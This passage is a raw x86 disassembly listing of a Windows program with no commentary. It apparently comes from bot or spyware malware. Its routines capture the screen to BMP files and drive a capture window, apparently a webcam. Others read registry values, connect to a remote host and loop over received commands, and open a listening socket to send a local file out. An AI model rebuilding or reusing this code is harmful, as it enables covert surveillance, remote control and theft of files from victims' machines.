sub_418087 pop ecx test eax, eax pop ecx jz short loc_415353 loc_415339: ; CODE XREF: sub_41528E+90j ; sub_41528E+96j push edi lea eax, [ebp+var_118] push [ebp+var_14] push esi push eax push [ebp+var_11C] call sub_409A73 add esp, 14h loc_415353: ; CODE XREF: sub_41528E+87j ; sub_41528E+A9j inc [ebp+arg_0] add esi, 80h cmp esi, offset dword_4D327C jl short loc_41530A loc_415364: ; CODE XREF: sub_41528E+82j lea eax, [ebp+var_31C] push offset dword_4368A0 push eax call sub_41B886 xor esi, esi pop ecx cmp [ebp+var_10], esi pop ecx jnz short loc_41539E push esi lea eax, [ebp+var_31C] push [ebp+var_14] push eax lea eax, [ebp+var_118] push eax push [ebp+var_11C] call sub_409A73 add esp, 14h loc_41539E: ; CODE XREF: sub_41528E+EEj lea eax, [ebp+var_31C] push eax call sub_4151AD push [ebp+var_18] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread pop edi pop esi sub_41528E endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4153BD proc near ; CODE XREF: sub_401ACD+7350p var_484 = byte ptr -484h var_84 = dword ptr -84h var_80 = dword ptr -80h var_7C = dword ptr -7Ch var_78 = word ptr -78h var_76 = word ptr -76h var_74 = dword ptr -74h var_70 = dword ptr -70h var_6C = dword ptr -6Ch var_68 = dword ptr -68h var_64 = dword ptr -64h var_60 = dword ptr -60h var_58 = dword ptr -58h var_54 = dword ptr -54h var_50 = dword ptr -50h var_4C = word ptr -4Ch var_4A = word ptr -4Ah var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = word ptr -30h var_2E = dword ptr -2Eh var_2A = word ptr -2Ah var_28 = word ptr -28h var_26 = dword ptr -26h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = byte ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 484h push ebx push esi xor esi, esi push edi push esi push esi push esi push offset aDisplay ; "DISPLAY" call ds:dword_4CB640 ; CreateDCA mov edi, eax cmp edi, esi mov [ebp+var_20], edi jz loc_4155F1 push 8 push edi call ds:dword_4CB65C ; GetDeviceCaps push 0Ah push edi mov [ebp+var_8], eax call ds:dword_4CB65C ; GetDeviceCaps push 0Ch push edi mov [ebp+var_C], eax call ds:dword_4CB65C ; GetDeviceCaps cmp eax, 8 mov [ebp+var_10], eax ja short loc_41541F push 18h push edi call ds:dword_4CB65C ; GetDeviceCaps mov ebx, 100h jmp short loc_415421 ; --------------------------------------------------------------------------- loc_41541F: ; CODE XREF: sub_4153BD+50j xor ebx, ebx loc_415421: ; CODE XREF: sub_4153BD+60j push edi call ds:dword_4CB6A0 ; CreateCompatibleDC cmp eax, esi mov [ebp+var_4], eax jz loc_4155D6 mov eax, [ebp+var_8] push esi mov [ebp+var_80], eax mov eax, [ebp+var_C] mov [ebp+var_7C], eax mov ax, word ptr [ebp+var_10] mov [ebp+var_76], ax lea eax, [ebp+var_18] push esi push eax lea eax, [ebp+var_84] push 1 push eax push edi mov [ebp+var_84], 28h mov [ebp+var_78], 1 mov [ebp+var_74], esi mov [ebp+var_70], esi mov [ebp+var_6C], esi mov [ebp+var_68], esi mov [ebp+var_64], ebx mov [ebp+var_60], ebx call ds:dword_4CB698 ; CreateDIBSection cmp eax, esi mov [ebp+var_1C], eax jz loc_4155E1 push eax push [ebp+var_4] call ds:dword_4CB524 ; SelectObject cmp eax, esi jz loc_4155E1 cmp eax, 0FFFFFFFFh jz loc_4155E1 push 0CC0020h push esi push esi push edi push [ebp+var_C] push [ebp+var_8] push esi push esi push [ebp+var_4] call ds:dword_4CB69C ; BitBlt test eax, eax jz loc_4155E1 cmp ebx, esi jz short loc_4154DE lea eax, [ebp+var_484] push eax push ebx push esi push [ebp+var_4] call ds:dword_4CB578 ; GetDIBColorTable mov ebx, eax loc_4154DE: ; CODE XREF: sub_4153BD+10Bj mov edi, [ebp+var_10] mov ecx, [ebp+var_8] imul edi, [ebp+var_C] imul edi, ecx mov eax, ebx push esi shr edi, 3 shl eax, 2 mov [ebp+var_8], eax push 80h lea edx, [eax+edi+36h] add eax, 36h push 2 mov [ebp+var_26], eax mov eax, [ebp+var_C] push esi push esi push 40000000h push [ebp+arg_0] mov [ebp+var_50], eax mov ax, word ptr [ebp+var_10] mov [ebp+var_30], 4D42h mov [ebp+var_2E], edx mov [ebp+var_2A], si mov [ebp+var_28], si mov [ebp+var_58], 28h mov [ebp+var_54], ecx mov [ebp+var_4C], 1 mov [ebp+var_4A], ax mov [ebp+var_48], esi mov [ebp+var_44], esi mov [ebp+var_40], esi mov [ebp+var_3C], esi mov [ebp+var_38], ebx mov [ebp+var_34], esi call dword_4270EC ; CreateFileA cmp eax, 0FFFFFFFFh mov [ebp+arg_0], eax jz short loc_4155C1 lea ecx, [ebp+var_14] push esi push ecx lea ecx, [ebp+var_30] push 0Eh push ecx push eax call dword_4270E0 ; WriteFile lea eax, [ebp+var_14] push esi push eax lea eax, [ebp+var_58] push 28h push eax push [ebp+arg_0] call dword_4270E0 ; WriteFile cmp ebx, esi jz short loc_4155A3 lea eax, [ebp+var_14] push esi push eax lea eax, [ebp+var_484] push [ebp+var_8] push eax push [ebp+arg_0] call dword_4270E0 ; WriteFile loc_4155A3: ; CODE XREF: sub_4153BD+1CCj lea eax, [ebp+var_14] push esi push eax push edi push [ebp+var_18] push [ebp+arg_0] call dword_4270E0 ; WriteFile push [ebp+arg_0] call dword_427068 ; CloseHandle push 1 pop esi loc_4155C1: ; CODE XREF: sub_4153BD+1A2j push [ebp+var_1C] call ds:dword_4CB5B0 ; DeleteObject push [ebp+var_4] call ds:dword_4CB510 ; DeleteDC mov edi, [ebp+var_20] loc_4155D6: ; CODE XREF: sub_4153BD+70j push edi call ds:dword_4CB510 ; DeleteDC mov eax, esi jmp short loc_4155F3 ; --------------------------------------------------------------------------- loc_4155E1: ; CODE XREF: sub_4153BD+C7j ; sub_4153BD+D9j ... push edi call ds:dword_4CB510 ; DeleteDC push [ebp+var_4] call ds:dword_4CB510 ; DeleteDC loc_4155F1: ; CODE XREF: sub_4153BD+23j xor eax, eax loc_4155F3: ; CODE XREF: sub_4153BD+222j pop edi pop esi pop ebx leave retn sub_4153BD endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4155F8 proc near ; CODE XREF: sub_401ACD+7477p var_34 = byte ptr -34h var_20 = dword ptr -20h var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 34h push ebx push esi push edi push 1 pop esi xor ebx, ebx push esi push ds:dword_4D3280 push 78h push 0A0h push ebx push ebx push 40000000h push offset aWindow ; "Window" call ds:dword_4CB5A4 mov edi, eax cmp edi, ebx mov [ebp+var_4], edi jnz short loc_415636 mov eax, esi jmp loc_4157EC ; --------------------------------------------------------------------------- loc_415636: ; CODE XREF: sub_4155F8+35j push edi call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_415653 push ebx push [ebp+arg_4] push 40Ah push edi call ds:dword_4CB6B0 ; SendMessageA jmp short loc_415655 ; --------------------------------------------------------------------------- loc_415653: ; CODE XREF: sub_4155F8+47j xor eax, eax loc_415655: ; CODE XREF: sub_4155F8+59j cmp eax, ebx jnz short loc_415660 loc_415659: ; CODE XREF: sub_4155F8+88j ; sub_4155F8+BCj mov ebx, esi jmp loc_4157E1 ; --------------------------------------------------------------------------- loc_415660: ; CODE XREF: sub_4155F8+5Fj push edi call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_41567D lea eax, [ebp+var_34] push eax push 2Ch push 40Eh push edi call ds:dword_4CB6B0 ; SendMessageA loc_41567D: ; CODE XREF: sub_4155F8+71j cmp [ebp+var_20], ebx jz short loc_415659 push edi call ds:dword_4CB5F4 ; IsWindow test eax, eax mov edi, 42Ch jz short loc_4156A3 push ebx push ebx push edi push [ebp+var_4] call ds:dword_4CB6B0 ; SendMessageA mov [ebp+arg_4], eax jmp short loc_4156A6 ; --------------------------------------------------------------------------- loc_4156A3: ; CODE XREF: sub_4155F8+98j mov [ebp+arg_4], ebx loc_4156A6: ; CODE XREF: sub_4155F8+A9j push [ebp+arg_4] call sub_41B4D5 cmp eax, ebx pop ecx mov [ebp+var_8], eax jz short loc_415659 push [ebp+arg_4] call sub_41B4D5 mov esi, eax pop ecx cmp esi, ebx jnz short loc_4156CD push 1 pop ebx jmp loc_4157E1 ; --------------------------------------------------------------------------- loc_4156CD: ; CODE XREF: sub_4155F8+CBj push [ebp+var_4] call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_4156EA push [ebp+var_8] push [ebp+arg_4] push edi push [ebp+var_4] call ds:dword_4CB6B0 ; SendMessageA loc_4156EA: ; CODE XREF: sub_4155F8+E0j push [ebp+arg_4] push [ebp+var_8] push esi call sub_41C310 mov ecx, [ebp+arg_8] add esp, 0Ch cmp ecx, ebx jg short loc_415705 mov ecx, 280h loc_415705: ; CODE XREF: sub_4155F8+106j mov eax, [ebp+arg_C] cmp eax, ebx jg short loc_415711 mov eax, 1E0h loc_415711: ; CODE XREF: sub_4155F8+112j push [ebp+var_4] mov [esi+4], ecx mov [esi+8], eax mov word ptr [esi+0Eh], 10h mov [esi+14h], ebx mov [esi+10h], ebx mov [esi+20h], ebx mov [esi+24h], ebx mov word ptr [esi+0Ch], 1 mov [esi+28h], bl mov [esi+29h], bl mov [esi+2Ah], bl mov [esi+2Bh], bl call ds:dword_4CB5F4 ; IsWindow test eax, eax mov edi, 42Dh jz short loc_41575B push esi push [ebp+arg_4] push edi push [ebp+var_4] call ds:dword_4CB6B0 ; SendMessageA loc_41575B: ; CODE XREF: sub_4155F8+153j push [ebp+var_4] call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_415778 push ebx push ebx push 43Dh push [ebp+var_4] call ds:dword_4CB6B0 ; SendMessageA loc_415778: ; CODE XREF: sub_4155F8+16Ej push [ebp+var_4] call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_415797 push [ebp+arg_0] push ebx push 419h push [ebp+var_4] call ds:dword_4CB6B0 ; SendMessageA loc_415797: ; CODE XREF: sub_4155F8+18Bj push [ebp+var_4] call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_4157B4 push [ebp+var_8] push [ebp+arg_4] push edi push [ebp+var_4] call ds:dword_4CB6B0 ; SendMessageA loc_4157B4: ; CODE XREF: sub_4155F8+1AAj push [ebp+var_8] call sub_41B0B1 push esi call sub_41B0B1 pop ecx pop ecx push [ebp+var_4] call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_4157E1 push ebx push ebx push 40Bh push [ebp+var_4] call ds:dword_4CB6B0 ; SendMessageA loc_4157E1: ; CODE XREF: sub_4155F8+63j ; sub_4155F8+D0j ... push [ebp+var_4] call ds:dword_4CB704 ; DestroyWindow mov eax, ebx loc_4157EC: ; CODE XREF: sub_4155F8+39j pop edi pop esi pop ebx leave retn sub_4155F8 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4157F1 proc near ; CODE XREF: sub_401ACD+752Fp var_90 = byte ptr -90h var_7C = dword ptr -7Ch var_64 = dword ptr -64h var_60 = dword ptr -60h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp sub esp, 90h push ebx push esi push edi push 1 pop esi xor ebx, ebx push esi push ds:dword_4D3280 push 78h push 0A0h push ebx push ebx push 40000000h push offset aWindow ; "Window" call ds:dword_4CB5A4 mov edi, eax cmp edi, ebx jnz short loc_41582F mov eax, esi jmp loc_415A2B ; --------------------------------------------------------------------------- loc_41582F: ; CODE XREF: sub_4157F1+35j push edi call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_41584C push ebx push [ebp+arg_4] push 40Ah push edi call ds:dword_4CB6B0 ; SendMessageA jmp short loc_41584E ; --------------------------------------------------------------------------- loc_41584C: ; CODE XREF: sub_4157F1+47j xor eax, eax loc_41584E: ; CODE XREF: sub_4157F1+59j cmp eax, ebx jnz short loc_415859 loc_415852: ; CODE XREF: sub_4157F1+8Bj ; sub_4157F1+BCj mov ebx, esi jmp loc_415A22 ; --------------------------------------------------------------------------- loc_415859: ; CODE XREF: sub_4157F1+5Fj push edi call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_415879 lea eax, [ebp+var_90] push eax push 2Ch push 40Eh push edi call ds:dword_4CB6B0 ; SendMessageA loc_415879: ; CODE XREF: sub_4157F1+71j cmp [ebp+var_7C], ebx jz short loc_415852 push edi call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_41589C push ebx push ebx push 42Ch push edi call ds:dword_4CB6B0 ; SendMessageA mov [ebp+arg_4], eax jmp short loc_41589F ; --------------------------------------------------------------------------- loc_41589C: ; CODE XREF: sub_4157F1+96j mov [ebp+arg_4], ebx loc_41589F: ; CODE XREF: sub_4157F1+A9j push [ebp+arg_4] call sub_41B4D5 cmp eax, ebx pop ecx mov [ebp+var_4], eax jz short loc_415852 push [ebp+arg_4] call sub_41B4D5 mov esi, eax pop ecx cmp esi, ebx jnz short loc_4158C6 push 1 pop ebx jmp loc_415A22 ; --------------------------------------------------------------------------- loc_4158C6: ; CODE XREF: sub_4157F1+CBj push edi call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_4158E3 push [ebp+var_4] push [ebp+arg_4] push 42Ch push edi call ds:dword_4CB6B0 ; SendMessageA loc_4158E3: ; CODE XREF: sub_4157F1+DEj push [ebp+arg_4] push [ebp+var_4] push esi call sub_41C310 mov ecx, [ebp+arg_C] add esp, 0Ch cmp ecx, ebx jg short loc_4158FE mov ecx, 0A0h loc_4158FE: ; CODE XREF: sub_4157F1+106j mov eax, [ebp+arg_10] cmp eax, ebx jg short loc_415908 push 78h pop eax loc_415908: ; CODE XREF: sub_4157F1+112j push edi mov [esi+4], ecx mov [esi+8], eax mov word ptr [esi+0Eh], 10h mov [esi+14h], ebx mov [esi+10h], ebx mov [esi+20h], ebx mov [esi+24h], ebx mov word ptr [esi+0Ch], 1 mov [esi+28h], bl mov [esi+29h], bl mov [esi+2Ah], bl mov [esi+2Bh], bl call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_41594D push esi push [ebp+arg_4] push 42Dh push edi call ds:dword_4CB6B0 ; SendMessageA loc_41594D: ; CODE XREF: sub_4157F1+14Aj push edi call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_41596A lea eax, [ebp+var_64] push eax push 60h push 441h push edi call ds:dword_4CB6B0 ; SendMessageA loc_41596A: ; CODE XREF: sub_4157F1+165j push edi mov [ebp+var_60], ebx mov [ebp+var_3C], ebx mov [ebp+var_38], ebx mov [ebp+var_34], ebx mov [ebp+var_30], 1 mov [ebp+var_2C], 5 mov [ebp+var_64], 1046Ah call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_4159A8 lea eax, [ebp+var_64] push eax push 60h push 440h push edi call ds:dword_4CB6B0 ; SendMessageA loc_4159A8: ; CODE XREF: sub_4157F1+1A3j push edi call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_4159C3 push [ebp+arg_0] push ebx push 414h push edi call ds:dword_4CB6B0 ; SendMessageA loc_4159C3: ; CODE XREF: sub_4157F1+1C0j push edi call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_4159DC push ebx push ebx push 43Eh push edi call ds:dword_4CB6B0 ; SendMessageA loc_4159DC: ; CODE XREF: sub_4157F1+1DBj push edi call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_4159F9 push [ebp+var_4] push [ebp+arg_4] push 42Dh push edi call ds:dword_4CB6B0 ; SendMessageA loc_4159F9: ; CODE XREF: sub_4157F1+1F4j push [ebp+var_4] call sub_41B0B1 push esi call sub_41B0B1 pop ecx pop ecx push edi call ds:dword_4CB5F4 ; IsWindow test eax, eax jz short loc_415A22 push ebx push ebx push 40Bh push edi call ds:dword_4CB6B0 ; SendMessageA loc_415A22: ; CODE XREF: sub_4157F1+63j ; sub_4157F1+D0j ... push edi call ds:dword_4CB704 ; DestroyWindow mov eax, ebx loc_415A2B: ; CODE XREF: sub_4157F1+39j pop edi pop esi pop ebx leave retn sub_4157F1 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_415A30 proc near ; CODE XREF: sub_401ACD+25F2p var_3F4 = byte ptr -3F4h var_2F0 = byte ptr -2F0h var_F0 = byte ptr -0F0h var_70 = byte ptr -70h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 3F4h push ebx xor ebx, ebx cmp off_4368EC, ebx mov [ebp+var_C], 80h jz loc_415BD1 push esi push edi mov eax, offset off_4368EC mov esi, offset dword_4368F8 mov edi, offset dword_437AF0 loc_415A60: ; CODE XREF: sub_415A30+199j lea ecx, [ebp+var_4] push ecx push 20019h push ebx push dword ptr [eax] push dword ptr [esi-10h] call ds:dword_4CB6C4 ; RegOpenKeyExA lea eax, [ebp+var_C] push eax lea eax, [ebp+var_F0] push eax push ebx push ebx push dword ptr [esi-8] push [ebp+var_4] call ds:dword_4CB554 ; RegQueryValueExA test eax, eax jnz loc_415BB7 mov eax, [esi] cmp eax, ebx jz loc_415B7B push eax lea eax, [ebp+var_F0] push eax lea eax, [ebp+var_3F4] push offset dword_429AC8 push eax call sub_41B886 lea eax, [ebp+var_3F4] push offset aR ; "r" push eax call sub_41B4C2 add esp, 18h cmp eax, ebx mov [ebp+var_8], eax jz loc_415BB7 push eax loc_415AD9: ; CODE XREF: sub_415A30+D4j lea eax, [ebp+var_70] push 64h push eax call sub_41BB4F add esp, 0Ch test eax, eax jz loc_415B70 push dword ptr [esi+4] lea eax, [ebp+var_70] push eax call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_415B06 push [ebp+var_8] jmp short loc_415AD9 ; --------------------------------------------------------------------------- loc_415B06: ; CODE XREF: sub_415A30+CFj push 3Dh push dword ptr [esi+4] call sub_41BFB0 pop ecx test eax, eax pop ecx jz short loc_415B34 lea eax, [ebp+var_70] push offset asc_437AEC ; "=" push eax call sub_41C0F4 push offset asc_437AEC ; "=" push ebx call sub_41C0F4 add esp, 10h jmp short loc_415B37 ; --------------------------------------------------------------------------- loc_415B34: ; CODE XREF: sub_415A30+E4j lea eax, [ebp+var_70] loc_415B37: ; CODE XREF: sub_415A30+102j push eax lea eax, [ebp+var_2F0] push dword ptr [esi-4] push edi push eax call sub_41B886 add esp, 10h lea eax, [ebp+var_2F0] push ebx push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 lea eax, [ebp+var_2F0] push eax call sub_4151AD add esp, 18h loc_415B70: ; CODE XREF: sub_415A30+B9j push [ebp+var_8] call sub_41B05B pop ecx jmp short loc_415BB7 ; --------------------------------------------------------------------------- loc_415B7B: ; CODE XREF: sub_415A30+6Aj lea eax, [ebp+var_F0] push eax lea eax, [ebp+var_2F0] push dword ptr [esi-4] push edi push eax call sub_41B886 push ebx lea eax, [ebp+var_2F0] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 lea eax, [ebp+var_2F0] push eax call sub_4151AD add esp, 28h loc_415BB7: ; CODE XREF: sub_415A30+60j ; sub_415A30+A2j ... push [ebp+var_4] call ds:dword_4CB630 ; RegCloseKey add esi, 18h cmp [esi-0Ch], ebx lea eax, [esi-0Ch] jnz loc_415A60 pop edi pop esi loc_415BD1: ; CODE XREF: sub_415A30+19j pop ebx leave retn sub_415A30 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_415BD4 proc near ; CODE XREF: sub_415C5A+33p ; sub_4161BD+BCp var_10 = word ptr -10h var_E = word ptr -0Eh var_C = dword ptr -0Ch arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 10h push esi push edi push 0 push 1 push 2 call ds:dword_4CB6D4 ; socket mov edi, eax or esi, 0FFFFFFFFh cmp edi, esi jz short loc_415C50 push 10h lea eax, [ebp+var_10] push 0 push eax call sub_41B590 add esp, 0Ch mov [ebp+var_10], 2 push [ebp+arg_4] call ds:dword_4CB654 ; htons push [ebp+arg_0] mov [ebp+var_E], ax call ds:dword_4CB694 ; inet_addr cmp eax, esi jnz short loc_415C35 push [ebp+arg_0] call ds:dword_4CB6D8 ; gethostbyname test eax, eax jz short loc_415C50 mov eax, [eax+0Ch] mov eax, [eax] mov eax, [eax] loc_415C35: ; CODE XREF: sub_415BD4+4Bj mov [ebp+var_C], eax lea eax, [ebp+var_10] push 10h push eax push edi call ds:dword_4CB5FC ; connect cmp eax, esi jnz short loc_415C54 push edi call ds:dword_4CB6EC ; closesocket loc_415C50: ; CODE XREF: sub_415BD4+1Bj ; sub_415BD4+58j mov eax, esi jmp short loc_415C56 ; --------------------------------------------------------------------------- loc_415C54: ; CODE XREF: sub_415BD4+73j mov eax, edi loc_415C56: ; CODE XREF: sub_415BD4+7Ej pop edi pop esi leave retn sub_415BD4 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_415C5A proc near ; DATA XREF: sub_401ACD+A1Eo var_11B4 = byte ptr -11B4h var_1B4 = byte ptr -1B4h var_1AC = byte ptr -1ACh var_94 = byte ptr -94h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 11B4h call sub_41BB20 mov eax, [ebp+arg_0] push ebx push esi push edi push 6Dh mov esi, eax pop ecx lea edi, [ebp+var_1B4] rep movsd push 1 pop esi push [ebp+var_14] mov [eax+1B0h], esi lea eax, [ebp+var_1AC] push eax call sub_415BD4 mov ebx, eax pop ecx cmp ebx, 0FFFFFFFFh pop ecx jnz short loc_415CED lea eax, [ebp+var_11B4] push offset unk_437B6C push eax call sub_41B886 xor edi, edi pop ecx cmp [ebp+var_8], edi pop ecx jnz short loc_415CD0 push edi lea eax, [ebp+var_11B4] push [ebp+var_C] push eax lea eax, [ebp+var_94] push eax push ebx call sub_409A73 add esp, 14h loc_415CD0: ; CODE XREF: sub_415C5A+59j lea eax, [ebp+var_11B4] push eax call sub_4151AD push [ebp+var_10] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread loc_415CED: ; CODE XREF: sub_415C5A+3Fj push offset byte_43D808 push ebx call sub_419C65 pop ecx cmp eax, 0FFFFFFFFh pop ecx jnz short loc_415D58 lea eax, [ebp+var_11B4] push offset unk_437B3C push eax call sub_41B886 xor edi, edi pop ecx cmp [ebp+var_8], edi pop ecx jnz short loc_415D34 push edi lea eax, [ebp+var_11B4] push [ebp+var_C] push eax lea eax, [ebp+var_94] push eax push ebx call sub_409A73 add esp, 14h loc_415D34: ; CODE XREF: sub_415C5A+BDj lea eax, [ebp+var_11B4] push eax call sub_4151AD pop ecx push ebx call ds:dword_4CB6EC ; closesocket push [ebp+var_10] call sub_40B413 pop ecx push esi call dword_4270CC ; ExitThread loc_415D58: ; CODE XREF: sub_415C5A+A3j push 64h call dword_427078 ; Sleep xor edi, edi mov esi, 1000h loc_415D67: ; CODE XREF: sub_415C5A+168j push esi lea eax, [ebp+var_11B4] push edi push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_11B4] push edi push esi push eax push ebx call ds:dword_4CB66C ; recv test eax, eax jle short loc_415DC4 lea eax, [ebp+var_11B4] push offset asc_42A0A4 ; "\n" push eax call sub_41BEC0 lea eax, [ebp+var_11B4] push eax call sub_419A51 add esp, 0Ch test eax, eax jz short loc_415DC4 push 64h call dword_427078 ; Sleep push 0Ah call sub_40B33F test eax, eax pop ecx jnz short loc_415D67 loc_415DC4: ; CODE XREF: sub_415C5A+130j ; sub_415C5A+154j lea eax, [ebp+var_11B4] push offset unk_437B08 push eax call sub_41B886 cmp [ebp+var_8], edi pop ecx pop ecx jnz short loc_415DF7 push edi lea eax, [ebp+var_11B4] push [ebp+var_C] push eax lea eax, [ebp+var_94] push eax push ebx call sub_409A73 add esp, 14h loc_415DF7: ; CODE XREF: sub_415C5A+180j lea eax, [ebp+var_11B4] push eax call sub_4151AD pop ecx push ebx call ds:dword_4CB6EC ; closesocket push [ebp+var_10] call sub_40B413 pop ecx push edi call dword_4270CC ; ExitThread sub_415C5A endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_415E1B proc near ; DATA XREF: sub_401ACD+7832o var_A04 = byte ptr -0A04h var_604 = byte ptr -604h var_500 = dword ptr -500h var_4FC = dword ptr -4FCh var_3FC = byte ptr -3FCh var_1FC = dword ptr -1FCh var_1F8 = dword ptr -1F8h var_1E0 = byte ptr -1E0h var_DC = byte ptr -0DCh var_58 = dword ptr -58h var_54 = dword ptr -54h var_50 = dword ptr -50h var_48 = byte ptr -48h var_44 = dword ptr -44h var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = word ptr -30h var_2E = dword ptr -2Eh var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 0A04h mov eax, [ebp+arg_0] push ebx push esi push edi push 6Dh mov esi, eax pop ecx lea edi, [ebp+var_1FC] rep movsd push 1 xor esi, esi pop ebx mov [ebp+var_10], esi push esi push ebx push 2 mov [eax+1B0h], ebx mov [ebp+var_C], esi mov [ebp+var_20], esi call ds:dword_4CB6D4 ; socket mov edi, eax cmp edi, 0FFFFFFFFh mov [ebp+var_18], edi jnz short loc_415E69 push offset unk_437C6C jmp loc_416022 ; --------------------------------------------------------------------------- loc_415E69: ; CODE XREF: sub_415E1B+42j push 10h lea eax, [ebp+var_30] push esi push eax call sub_41B590 add esp, 0Ch mov [ebp+var_30], 2 push esi call ds:dword_4CB654 ; htons mov word ptr [ebp+var_2E], ax lea eax, [ebp+var_30] push 10h push eax push edi mov [ebp+var_2E+2], esi call ds:dword_4CB680 ; bind test eax, eax jz short loc_415EA7 push offset unk_437C48 jmp loc_416022 ; --------------------------------------------------------------------------- loc_415EA7: ; CODE XREF: sub_415E1B+80j lea eax, [ebp+var_1C] mov [ebp+var_1C], 10h push eax lea eax, [ebp+var_30] push eax push edi call ds:dword_4CB5F8 ; getsockname push [ebp+var_2E] call ds:dword_4CB584 ; htons mov [ebp+var_4], eax lea eax, [ebp+var_1E0] push eax mov [ebp+arg_0], esi call sub_41AFE0 pop ecx loc_415ED9: ; CODE XREF: sub_415E1B+EFj mov ecx, [ebp+arg_0] mov al, [ebp+ecx+var_1E0] cmp al, 20h jnz short loc_415EEC push 5Fh pop eax jmp short loc_415EEF ; --------------------------------------------------------------------------- loc_415EEC: ; CODE XREF: sub_415E1B+CAj movsx eax, al loc_415EEF: ; CODE XREF: sub_415E1B+CFj mov [ebp+ecx+var_604], al lea eax, [ebp+var_1E0] inc ecx push eax mov [ebp+arg_0], ecx call sub_41AFE0 cmp [ebp+arg_0], eax pop ecx jbe short loc_415ED9 push ebx push edi call ds:dword_4CB67C ; listen test eax, eax jz short loc_415F22 push offset unk_437B6C jmp loc_416022 ; --------------------------------------------------------------------------- loc_415F22: ; CODE XREF: sub_415E1B+FBj push esi push esi push 3 push esi push ebx lea eax, [ebp+var_1E0] push 80000000h push eax call dword_4270EC ; CreateFileA cmp eax, 0FFFFFFFFh mov [ebp+var_8], eax jnz short loc_415F4C push offset unk_437C28 jmp loc_416022 ; --------------------------------------------------------------------------- loc_415F4C: ; CODE XREF: sub_415E1B+125j push esi push eax call dword_427108 ; GetFileSize mov [ebp+arg_0], eax push eax movzx eax, word ptr [ebp+var_4] push eax push [ebp+var_1FC] call sub_40AC10 pop ecx push eax call ds:dword_4CB694 ; inet_addr push eax call ds:dword_4CB650 ; htonl push eax lea eax, [ebp+var_1E0] push eax lea eax, [ebp+var_3FC] push offset dword_437C10 push eax call sub_41B886 push esi lea eax, [ebp+var_3FC] push esi push eax lea eax, [ebp+var_DC] push eax push [ebp+var_1FC] call sub_409A73 add esp, 2Ch lea eax, [ebp+var_38] mov [ebp+var_38], 3Ch mov [ebp+var_34], esi push eax push esi lea eax, [ebp+var_500] push esi push eax push esi mov [ebp+var_4FC], edi mov [ebp+var_500], ebx call ds:dword_4CB63C ; select test eax, eax jg short loc_415FFC push esi lea eax, [ebp+var_DC] push [ebp+var_54] push offset dword_437BF8 push eax push [ebp+var_1FC] call sub_409A73 jmp loc_416120 ; --------------------------------------------------------------------------- loc_415FFC: ; CODE XREF: sub_415E1B+1BFj lea eax, [ebp+var_14] mov [ebp+var_14], 10h push eax lea eax, [ebp+var_48] push eax push edi call ds:dword_4CB6E8 ; accept cmp eax, 0FFFFFFFFh mov [ebp+var_1F8], eax jnz short loc_416035 push offset unk_437BD4 loc_416022: ; CODE XREF: sub_415E1B+49j ; sub_415E1B+87j ... lea eax, [ebp+var_3FC] push eax call sub_41B886 pop ecx pop ecx jmp loc_416123 ; --------------------------------------------------------------------------- loc_416035: ; CODE XREF: 